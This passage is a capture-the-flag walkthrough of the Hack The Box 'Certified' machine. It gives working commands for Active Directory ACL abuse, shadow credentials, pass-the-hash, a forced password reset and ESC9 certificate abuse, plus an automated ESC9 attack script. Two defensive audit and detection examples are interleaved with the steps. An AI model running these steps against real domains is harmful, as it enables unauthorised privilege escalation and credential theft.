<figure><img src="/files/iWG3d2nVOtaZUBPS5RTD" alt=""><figcaption></figcaption></figure>

Now we can start exploring the domain. The built-in queries are available in *Explore → Cypher → Open*. For example, let's list all domain admins.

<figure><img src="/files/Ko4wX39I00SIFmPbwntn" alt=""><figcaption></figcaption></figure>

To enumerate `judith.mader`, click on "Search" and type the username; the user icon is displayed. Then click on "Outbound Object Control" to list which objects the user `judith.mader` can control or manipulate.

<figure><img src="/files/MiXvUXZYZsFIZQU8Rvn7" alt=""><figcaption></figcaption></figure>

We see she has *WriteOwner* rights over the `management@certified.htb` group, meaning she has permissions to change the owner of this group.

## USER

By clicking on the *WriteOwner* edge, the application itself suggests an exploitation path.

<figure><img src="/files/XD4BVc3h865PIGWT0mRJ" alt=""><figcaption></figcaption></figure>

Basically, the abuse path is:

1. Leverage the *WriteOwner* right to set `judith.mader` as the group owner.
2. Grant `judith.mader` permission to add any user to the group.
3. Add `judith.mader` to the group.

Let's start by enumerating the `management@certified.htb` group with `ldapsearch`.

{% code overflow="wrap" %}

```bash
> ldapsearch -x -D "cn=judith mader,cn=users,dc=certified,dc=htb" -w judith09 -H ldap://certified.htb -b "cn=management,cn=users,dc=certified,dc=htb"
```

{% endcode %}

<figure><img src="/files/QLddUbhef1I8giY0YrNM" alt=""><figcaption></figcaption></figure>

Next, change the group owner with Impacket's `owneredit.py`. Version 0.12 is needed for this, so you may need to upgrade your packages.

```bash
> sudo apt update && sudo apt install -y --only-upgrade python3-impacket
```

`owneredit.py` accepts either `sAMAccountName` or `distinguishedName` to identify the target and the new owner. We can take either from BHCE.

{% code overflow="wrap" %}

```bash
> python3 /usr/share/doc/python3-impacket/examples/owneredit.py -action write -new-owner judith.mader -target Management 'certified.htb/judith.mader:judith09'
```

{% endcode %}

<figure><img src="/files/nzXHcq4YxnRaC729rUmc" alt=""><figcaption></figcaption></figure>

The next step is to edit the group's DACL, adding a new ACE that grants `judith.mader` permission to add new members. This is done with Impacket's `dacledit.py`.

{% code overflow="wrap" %}

```bash
> python3 /usr/share/doc/python3-impacket/examples/dacledit.py -action 'write' -rights 'WriteMembers' -target-dn "CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB" -principal "judith.mader" "certified.htb/judith.mader:judith09"
```

{% endcode %}

<figure><img src="/files/94iS4aJEjGpWahOkv0VP" alt=""><figcaption></figcaption></figure>

Now `judith.mader` has permission to add herself to the group. For this we use [bloodyAD](https://github.com/CravateRouge/bloodyAD).

{% code overflow="wrap" %}

```bash
> python3 /home/kali/.local/bin/bloodyAD -d certified.htb -u judith.mader -p judith09 --host 10.10.11.41 add groupMember Management judith.mader
```

{% endcode %}

<figure><img src="/files/9HHEUfEjdpyTFZKe9XIF" alt=""><figcaption></figcaption></figure>

We have taken ownership of the `management@certified.htb` group and added ourselves as a member. We mark it as "Owned" in BHCE and continue enumerating from there.
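The three-step chain above (WriteOwner, then WriteDacl, then WriteMembers) only works because non-privileged principals hold those rights on the group's security descriptor. The following is an added example, not code from the writeup or from BloodHound, that audits a group's DACL given as SDDL and reports exactly those rights when they are granted to anyone outside an assumed set of trusted administrative principals. The SDDL string, the SIDs in it and the `TRUSTED` set are constructed for the example.

```python
"""Audit a group's DACL (given as SDDL) for ACEs that grant the rights behind
the WriteOwner -> WriteDacl -> WriteMembers chain to principals that should
not hold them. Added example, not code from the writeup or from BloodHound."""
import re

# SDDL two-letter rights and the access-mask bits they stand for.
SDDL_RIGHTS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "WO": 0x00080000, "WD": 0x00040000, "RC": 0x00020000, "SD": 0x00010000,
    "CC": 0x01, "DC": 0x02, "LC": 0x04, "SW": 0x08, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
GENERIC_ALL, GENERIC_WRITE = 0x10000000, 0x40000000
WRITE_OWNER, WRITE_DAC, WRITE_PROP = 0x00080000, 0x00040000, 0x20
# Schema GUID of the "member" attribute: WP scoped to it is "WriteMembers".
MEMBER_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"
# SDDL aliases for principals expected to control a group (assumption: adjust
# to the domain's own delegation model).
TRUSTED = {"DA", "EA", "BA", "SY", "CO"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(rights):
    """Convert an SDDL rights string (two-letter codes or hex) to a mask."""
    if rights.startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= SDDL_RIGHTS[rights[i:i + 2]]
    return mask


def dacl_aces(sddl):
    """Return the ACE strings of the D: part of an SDDL descriptor."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    return ACE_RE.findall(m.group(1)) if m else []


def audit_group_dacl(sddl):
    """List (principal, right) pairs for abusable rights held by non-trusted principals."""
    findings = []
    for ace in dacl_aces(sddl):
        fields = ace.split(";")
        ace_type, rights, obj_guid, sid = fields[0], fields[2], fields[3], fields[5]
        if ace_type not in ("A", "OA") or sid in TRUSTED:
            continue  # deny ACEs and trusted principals are not findings
        mask = parse_rights(rights)
        if mask & GENERIC_ALL:
            findings.append((sid, "GenericAll"))
        if mask & GENERIC_WRITE:
            findings.append((sid, "GenericWrite"))
        if mask & WRITE_OWNER:
            findings.append((sid, "WriteOwner"))
        if mask & WRITE_DAC:
            findings.append((sid, "WriteDacl"))
        # WP on all properties (empty GUID) or on "member" lets the principal add members.
        if mask & WRITE_PROP and obj_guid.lower() in ("", MEMBER_GUID):
            findings.append((sid, "WriteMembers"))
    return findings


# Constructed SDDL for a "Management"-style group: Domain Admins have full
# control, Authenticated Users can read, the user with RID 1103 has WriteOwner
# and the user with RID 1105 has WP on the member attribute. SIDs are made up.
SAMPLE_SDDL = (
    "O:DAG:DAD:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;RPLCLORC;;;AU)"
    "(A;;WO;;;S-1-5-21-1111111111-2222222222-3333333333-1103)"
    "(OA;;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
)

if __name__ == "__main__":
    for sid, right in audit_group_dacl(SAMPLE_SDDL):
        print(f"{right:13} granted to {sid}")
```

Run against a real group, the SDDL comes from `nTSecurityDescriptor` (for example via `Get-Acl` on the AD drive or an LDAP query), and each reported pair is a candidate for removal; the WriteOwner finding alone is enough to start the chain shown above.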

The group has another member, the user `management_svc`, over which we have *GenericWrite* permissions as group owners. Again, by clicking on the edge, the tool suggests possible ways to abuse this.

<figure><img src="/files/AIamggzFZnmDJbL64ju2" alt=""><figcaption></figcaption></figure>

We see the possibility of launching a [shadow credentials attack](https://i-tracing.com/blog/dacl-shadow-credentials/) with [pyWhisker](https://github.com/ShutdownRepo/pywhisker).

In summary, in a shadow credentials attack the attacker populates the `msDS-KeyCredentialLink` attribute of the targeted account, which requires *GenericAll* or *GenericWrite* over it. A certificate matching the planted key (stored as a PFX file) is then used to authenticate as the target and obtain either a TGT or the target's NT hash. Either of these allows getting a shell in the context of the target account.

Let's start by populating the attribute with `pywhisker.py`. First we check the current status of the attribute.
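Because the attack leaves a write to `msDS-KeyCredentialLink` by a principal that is neither the account itself nor a provisioning identity, that write is the natural detection point. The following is an added example, not code from the writeup or from any of the tools it uses, that scans directory-change events for such writes. The records are constructed and only mirror the field names of Windows Security event 5136 (a directory service object was modified); the `ALLOWED_WRITERS` set is an assumption to tune per environment.

```python
"""Detect msDS-KeyCredentialLink writes by principals other than the account
itself or a known provisioning identity. Added example, not code from the
writeup; the event records below are constructed and only mirror the field
names of Windows Security event 5136."""

TARGET_ATTR = "msDS-KeyCredentialLink"
# Identities that legitimately write key credentials, e.g. the DC during
# Windows Hello key provisioning. Assumption: tune to the environment.
ALLOWED_WRITERS = {"CERTIFIED\\DC01$"}


def sam_from_dn(dn):
    """Take the leading CN of a distinguished name as the account name."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if first.upper().startswith("CN=") else dn


def detect_shadow_credential_writes(events):
    """Return one alert per suspicious value-add on msDS-KeyCredentialLink."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != TARGET_ATTR:
            continue
        if ev.get("OperationType") != "Value Added":
            continue  # deletions are cleanup, not a credential being planted
        subject = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
        target = sam_from_dn(ev["ObjectDN"])
        if subject in ALLOWED_WRITERS:
            continue
        if ev["SubjectUserName"].lower() == target.lower():
            continue  # an account registering its own key is the normal case
        alerts.append({"subject": subject, "target": target, "object": ev["ObjectDN"]})
    return alerts


# Constructed sample events (not real exported logs).
EVENTS = [
    # A user with GenericWrite plants a key on a service account: alert.
    {"EventID": 5136, "SubjectDomainName": "CERTIFIED", "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management_svc,CN=Users,DC=certified,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    # Same attribute, but written by the DC during provisioning: allowed.
    {"EventID": 5136, "SubjectDomainName": "CERTIFIED", "SubjectUserName": "DC01$",
     "ObjectDN": "CN=harry.wilson,CN=Users,DC=certified,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    # A user registering a key on their own account: not flagged.
    {"EventID": 5136, "SubjectDomainName": "CERTIFIED", "SubjectUserName": "gregory.cameron",
     "ObjectDN": "CN=gregory.cameron,CN=Users,DC=certified,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    # An unrelated attribute change: ignored.
    {"EventID": 5136, "SubjectDomainName": "CERTIFIED", "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management_svc,CN=Users,DC=certified,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": "Value Added"},
    # The attacker removing the key afterwards: the add was already alerted on.
    {"EventID": 5136, "SubjectDomainName": "CERTIFIED", "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management_svc,CN=Users,DC=certified,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Deleted"},
]

if __name__ == "__main__":
    for alert in detect_shadow_credential_writes(EVENTS):
        print(f'{alert["subject"]} added a key credential to {alert["target"]}')
```

Event 5136 is only generated when the "Audit Directory Service Changes" subcategory is enabled and the object's SACL audits writes to the attribute, so both must be in place before this logic has anything to read. Alerting on the event stream rather than on the attribute's current value matters because the key can be removed again once the hash has been obtained.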

{% code overflow="wrap" %}

```bash
> python3 ./pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target management_svc --action "list"
```

{% endcode %}

<figure><img src="/files/soM3LZy7VeGBteAVCPip" alt=""><figcaption></figcaption></figure>

The attribute is empty, so let's populate it.

{% code overflow="wrap" %}

```bash
> python3 ./pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target management_svc --action "add"
```

{% endcode %}

<figure><img src="/files/pHD05FeGPCfNQdRfUbmn" alt=""><figcaption></figcaption></figure>

The tool generates a PFX file containing a certificate and a private key, and suggests we can use it with [PKINITtools](https://github.com/dirkjanm/PKINITtools).

The procedure for requesting a TGT with `gettgtpkinit.py` and a PEM certificate is explained in the [pyWhisker GitHub repository](https://github.com/ShutdownRepo/pywhisker#example-with-the-pem-format). In our case we have a PFX certificate, but only a minor change to the command is needed.

Before using PKINITtools, the Minikerberos dependency must be installed manually.

```bash
> git clone https://github.com/skelsec/minikerberos.git

> cd minikerberos

> sudo python3 setup.py install
```

Now let's request a TGT for `management_svc` using the PFX certificate and `gettgtpkinit.py`. As always when requesting TGTs, remember to synchronize the clock to avoid skew errors.

{% code overflow="wrap" %}

```bash
> sudo ntpdate -u certified.htb && python3 ./gettgtpkinit.py -cert-pfx ../vf1j2lD5.pfx -pfx-pass grcbM93st8xX2VVWxOYM certified.htb/management_svc g1vi.ccache
```

{% endcode %}

<figure><img src="/files/KUVNmNeQ83xj5wSUuyfn" alt=""><figcaption></figcaption></figure>

The ticket has been saved. Export it for use.

```bash
> export KRB5CCNAME=./g1vi.ccache
```

And use it to retrieve the `management_svc` NT hash.

{% code overflow="wrap" %}

```bash
> sudo ntpdate -u  certified.htb && python3 ./getnthash.py -key 2c8b51c6b563a9653a3997f848e02fe56a4d048a8df30da5f85e660b03169d66 certified.htb/management_svc
```

{% endcode %}

<figure><img src="/files/f0yPhriy9DWdMe2Zajh5" alt=""><figcaption></figcaption></figure>

The only thing left is to open a shell as `management_svc` using the NT hash just retrieved.

```bash
> evil-winrm -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 -i certified.htb
```

<figure><img src="/files/pwmgNCRN1EcitdRFmba5" alt=""><figcaption></figcaption></figure>

And collect the user flag.

## SYSTEM

Start from the `management_svc` shell and take the opportunity to enumerate the system.

```powershell
Get-ComputerInfo
 
WindowsBuildLabEx                                       : 17763.1.amd64fre.rs5_release.180914-1434
WindowsCurrentVersion                                   : 6.3
WindowsProductName                                      : Windows Server 2019 Standard
WindowsVersion                                          : 1809
```

Enumerating the user in BHCE, we see it has *GenericAll* over another user, `ca_operator`. Clicking on the edge, the application suggests an abuse path, including a forced password change.

<figure><img src="/files/KJxpM2OSNTwBdhSb2yPM" alt=""><figcaption></figcaption></figure>

We can do a shadow credentials attack again, or force a [password change with bloodyAD](https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword).

{% code overflow="wrap" %}

```bash
> python3 /home/kali/.local/bin/bloodyAD -d certified.htb -u management_svc -p :a091c1832bcdd4677c28b5a6a1295584 --host 10.10.11.41 set password ca_operator 'password'
```

{% endcode %}

<figure><img src="/files/Be7WK7877jHWmyhU4k03" alt=""><figcaption></figcaption></figure>

The new credential does not work with Evil-WinRM, but we can check via SMB that the password has been successfully changed.

```bash
> smbmap -H certified.htb -P 445 -u ca_operator -p password
[+] IP: certified.htb:445       Name: unknown                                          
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
```

The username `ca_operator` strongly suggests AD CS is running on the machine. Since we have no local shell as `ca_operator` we cannot enumerate templates with `Certify.exe`, but we can do it remotely with Certipy, as we did in [Authority](/book/hack-the-box/release-arena/authority.md).

{% code overflow="wrap" %}

```bash
> certipy find -username ca_operator@certified.htb -password password -dc-ip 10.10.11.41 -vulnerable -stdout
```

{% endcode %}

Which reports there is a template `CertifiedAuthentication` vulnerable to ESC9.

<figure><img src="/files/LUp8EV9rCreXdaG2v996" alt=""><figcaption></figcaption></figure>

These ESC codes follow the terminology of the [original AD CS abuse whitepaper](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf), which initially described 8 domain escalation attacks (ESC1 to ESC8); the list was later extended by [subsequent research](https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html).

Let's abuse ESC9 following [the researcher's step-by-step](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7). We meet the requirements for this attack: `management_svc` has *GenericAll* (and therefore *GenericWrite*) over `ca_operator`, and `ca_operator` is allowed to enroll in the `CertifiedAuthentication` template, whose `msPKI-Enrollment-Flag` contains `CT_FLAG_NO_SECURITY_EXTENSION`. Because of that flag, certificates issued from the template carry no SID security extension, so the KDC has to map them to an account by UPN alone. The remaining condition is on the KDC side: `StrongCertificateBindingEnforcement` must not be set to full enforcement (`2`), or `CertificateMappingMethods` must still include the UPN flag (`0x4`). That is a registry setting we cannot read over LDAP, so the only way to find out is to try.

Following the guide, we first change the UPN of `ca_operator` to the bare name `Administrator`, authenticating as `management_svc` (here with its NT hash rather than a password).

{% code overflow="wrap" %}

```bash
> certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
```

{% endcode %}

<figure><img src="/files/BC2kYJJ6BgJNE6IkFbNB" alt=""><figcaption></figcaption></figure>

Now, as `ca_operator`, we request a certificate from the vulnerable `CertifiedAuthentication` template. The issued certificate carries the UPN `Administrator` and, because of `CT_FLAG_NO_SECURITY_EXTENSION`, no SID extension tying it back to `ca_operator`.

{% code overflow="wrap" %}

```bash
> certipy req -username ca_operator@certified.htb -p password -ca certified-DC01-CA -template CertifiedAuthentication -debug
```

{% endcode %}

<figure><img src="/files/MzQDqj1fg0oKEvF9rRKF" alt=""><figcaption></figcaption></figure>

Next, restore the original UPN of `ca_operator`. If we left it as `Administrator`, the UPN in the certificate would still resolve to `ca_operator` (and the account would be left broken); with it restored, the KDC maps `Administrator` to the real Administrator account.

{% code overflow="wrap" %}

```bash
> certipy account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb
```

{% endcode %}

<figure><img src="/files/wdSudqIRA6iBW0UJn3oz" alt=""><figcaption></figcaption></figure>

Finally, we authenticate with the certificate to obtain the NT hash of the Administrator. We have to pass `-domain`, because the UPN in the certificate is the bare `Administrator` with no domain suffix.

We also have to deal with Kerberos clock skew errors (`KRB_AP_ERR_SKEW`): stop the `timedatectl` automatic synchronization and sync manually against the DC with `rdate`.

```bash
> sudo timedatectl set-ntp off
 
> sudo rdate -n 10.10.11.41
Sat Jan 11 04:36:07 GMT 2025
```

Now, we can run `certipy` to request a TGT and retrieve the Administrator NT hash.

```bash
> certipy auth -pfx administrator.pfx -domain certified.htb
```

<figure><img src="/files/nHn7zxpHv3NPXFkSSqje" alt=""><figcaption></figcaption></figure>
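The whole chain wrapped as a script, as an added example that is neither part of this writeup nor of Certipy. It reuses the values the page shows (domain, DC address, CA name, template, both accounts and the `management_svc` hash); the `-dc-ip` arguments, the `DRY_RUN` switch, the function names and the two preflight checks are ours: `esc9_flag_set` tests an `msPKI-Enrollment-Flag` value for `CT_FLAG_NO_SECURITY_EXTENSION` (`0x00080000`, MS-CRTD) and `kdc_accepts_upn_only_cert` applies the KB5014754 rule for `StrongCertificateBindingEnforcement` and `CertificateMappingMethods`. The one thing it adds over the commands above is the `trap`: `ca_operator` gets its UPN back even if the certificate request fails halfway.

```shell
#!/bin/sh
# Added example for this writeup (not Certipy's or the box author's code): the ESC9
# chain above, wrapped so ca_operator's UPN is put back even when a step fails.
# Values below are the writeup's where it shows them; everything else is assumed.
set -eu

DOMAIN="${DOMAIN:-certified.htb}"
DC_IP="${DC_IP:-10.10.11.41}"
CA_NAME="${CA_NAME:-certified-DC01-CA}"
TEMPLATE="${TEMPLATE:-CertifiedAuthentication}"
WRITER="${WRITER:-management_svc}"                  # holds GenericWrite (here GenericAll) over VICTIM
WRITER_HASH="${WRITER_HASH:-a091c1832bcdd4677c28b5a6a1295584}"  # management_svc NT hash from the writeup
VICTIM="${VICTIM:-ca_operator}"                     # may enroll in TEMPLATE
VICTIM_PASS="${VICTIM_PASS:-password}"              # set with bloodyAD above
TARGET="${TARGET:-Administrator}"                   # account whose UPN we borrow
DRY_RUN="${DRY_RUN:-0}"                             # 1 = print the commands instead of running them

# CT_FLAG_NO_SECURITY_EXTENSION (0x00080000, MS-CRTD) in msPKI-Enrollment-Flag tells the CA
# to omit the szOID_NTDS_CA_SECURITY_EXT (SID) extension, so the KDC falls back to UPN mapping.
# Exit status 0 means the template is an ESC9 candidate. $1 = decimal flag value.
esc9_flag_set() {
  [ $(( $1 & 0x80000 )) -ne 0 ]
}

# KB5014754: with StrongCertificateBindingEnforcement=2 the KDC rejects certificates that lack
# the SID extension unless CertificateMappingMethods still contains the UPN flag (0x4).
# $1 = StrongCertificateBindingEnforcement, $2 = CertificateMappingMethods (both decimal).
kdc_accepts_upn_only_cert() {
  [ "$1" -ne 2 ] || [ $(( $2 & 0x4 )) -ne 0 ]
}

# Execute a command, or print it on one line when DRY_RUN=1.
run() {
  if [ "$DRY_RUN" = 1 ]; then printf '%s ' "$@"; printf '\n'; else "$@"; fi
}

set_upn() {   # $1 = new UPN for VICTIM, authenticated as WRITER with its NT hash
  run certipy account update -username "$WRITER@$DOMAIN" -hashes "$WRITER_HASH" \
      -dc-ip "$DC_IP" -user "$VICTIM" -upn "$1"
}

request_cert() {  # enroll as VICTIM; the issued cert carries UPN "$TARGET" and no SID extension
  run certipy req -username "$VICTIM@$DOMAIN" -p "$VICTIM_PASS" -dc-ip "$DC_IP" \
      -ca "$CA_NAME" -template "$TEMPLATE"
}

auth_as_target() {  # Certipy names the PFX after the lowercased UPN; -domain is needed, the UPN has none
  pfx="$(printf '%s' "$TARGET" | tr '[:upper:]' '[:lower:]').pfx"
  run certipy auth -pfx "$pfx" -domain "$DOMAIN" -dc-ip "$DC_IP"
}

esc9_chain() {
  # Restore the UPN whatever happens after we change it: leaving ca_operator with
  # UPN "Administrator" breaks its logons and is a loud artefact for defenders.
  trap 'set_upn "$VICTIM@$DOMAIN"' EXIT
  set_upn "$TARGET"
  request_cert
  trap - EXIT
  set_upn "$VICTIM@$DOMAIN"
  auth_as_target
}

if [ "${1:-}" = run ]; then
  esc9_chain
fi
```

Run `sh esc9.sh run` against the box, or `DRY_RUN=1 sh esc9.sh run` to only print the four Certipy invocations; the clock still has to be synced with the DC first, as above, and `esc9_flag_set` expects the decimal `msPKI-Enrollment-Flag` value as read from LDAP (`524288` is the bare `CT_FLAG_NO_SECURITY_EXTENSION`).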

And use it (pass-the-hash) to open a shell.

<figure><img src="/files/7ey01YbazTRo3QNdCFgT" alt=""><figcaption></figcaption></figure>

You are root.
